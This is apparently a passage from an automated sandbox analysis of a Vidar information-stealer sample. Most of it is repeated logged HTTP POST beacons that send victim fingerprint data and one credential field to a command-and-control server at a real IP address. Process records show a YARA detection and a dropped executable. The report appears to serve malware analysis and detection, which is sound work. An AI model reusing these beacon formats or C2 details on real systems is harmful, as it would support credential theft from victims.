                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.4 | 49785 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.030292034 CEST | 4795 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.4 | 49786 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.038460016 CEST | 4796 | OUT | POST //Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 21
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 63 72 65 64 3d
                                                                                                                                          Data Ascii: id=152138533219&cred=


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 176.111.174.114 | 80 | 192.168.2.4 | 49785 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.131082058 CEST | 4796 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 176.111.174.114 | 80 | 192.168.2.4 | 49786 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.139811993 CEST | 4797 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Refresh: 1; url = login.php
                                                                                                                                          Content-Length: 0
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.4 | 49787 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.342422009 CEST | 4797 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 176.111.174.114 | 80 | 192.168.2.4 | 49787 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.441771984 CEST | 4798 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49752 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:10.540479898 CEST | 4432 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
80 | 192.168.2.4 | 49789 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:22.657372952 CEST | 4798 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          81 | 176.111.174.114 | 80 | 192.168.2.4 | 49789 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:22.759411097 CEST | 4799 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:22 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          82 | 192.168.2.4 | 49790 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:22.965888977 CEST | 4799 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          83 | 176.111.174.114 | 80 | 192.168.2.4 | 49790 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.065470934 CEST | 4800 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          84 | 192.168.2.4 | 49791 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.285707951 CEST | 4800 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          85 | 176.111.174.114 | 80 | 192.168.2.4 | 49791 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.391833067 CEST | 4801 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          86 | 192.168.2.4 | 49793 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.594203949 CEST | 4801 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          87 | 176.111.174.114 | 80 | 192.168.2.4 | 49793 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.694056988 CEST | 4802 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          88 | 192.168.2.4 | 49794 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:23.904932022 CEST | 4803 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          89 | 176.111.174.114 | 80 | 192.168.2.4 | 49794 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.004654884 CEST | 4803 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          9 | 176.111.174.114 | 80 | 192.168.2.4 | 49752 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:10.649502993 CEST | 4489 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          90 | 192.168.2.4 | 49795 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.222855091 CEST | 4803 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          91 | 176.111.174.114 | 80 | 192.168.2.4 | 49795 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.323769093 CEST | 4804 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          92 | 192.168.2.4 | 49796 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.539024115 CEST | 4805 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          93 | 176.111.174.114 | 80 | 192.168.2.4 | 49796 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.642560959 CEST | 4805 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          94 | 192.168.2.4 | 49797 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.846404076 CEST | 4806 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          95 | 176.111.174.114 | 80 | 192.168.2.4 | 49797 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:24.952948093 CEST | 4806 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
96 | 192.168.2.4 | 49798 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.163521051 CEST | 4807 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
97 | 176.111.174.114 | 80 | 192.168.2.4 | 49798 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.269587040 CEST | 4807 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
98 | 192.168.2.4 | 49799 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.493153095 CEST | 4808 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
99 | 176.111.174.114 | 80 | 192.168.2.4 | 49799 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.592848063 CEST | 4808 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          HTTPS Packets

Timestamp: Apr 28, 2021 22:58:41.636985064 CEST
Source IP: 104.17.63.50
Source Port: 443
Dest IP: 192.168.2.4
Dest Port: 49733
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
Certificate 1:
Subject: CN=*.faceit.com, O=FACE IT LIMITED, L=London, C=GB
Issuer: CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before: Mon Jun 17 02:00:00 CEST 2019
Not After: Wed Jul 21 14:00:00 CEST 2021
Certificate 2:
Subject: CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before: Mon Nov 06 13:23:45 CET 2017
Not After: Sat Nov 06 13:23:45 CET 2027

                                                                                                                                          Code Manipulations

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Start time:22:58:38
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\Users\user\Desktop\wKYTg7Gp6P.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:573952 bytes
                                                                                                                                          MD5 hash:C4C7D74CA7C0FC1511A82B040A274549
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low

                                                                                                                                          General

                                                                                                                                          Start time:22:58:56
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe'
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:290304 bytes
                                                                                                                                          MD5 hash:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low

                                                                                                                                          General

                                                                                                                                          Start time:22:58:57
                                                                                                                                          Start date:28/04/2021
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
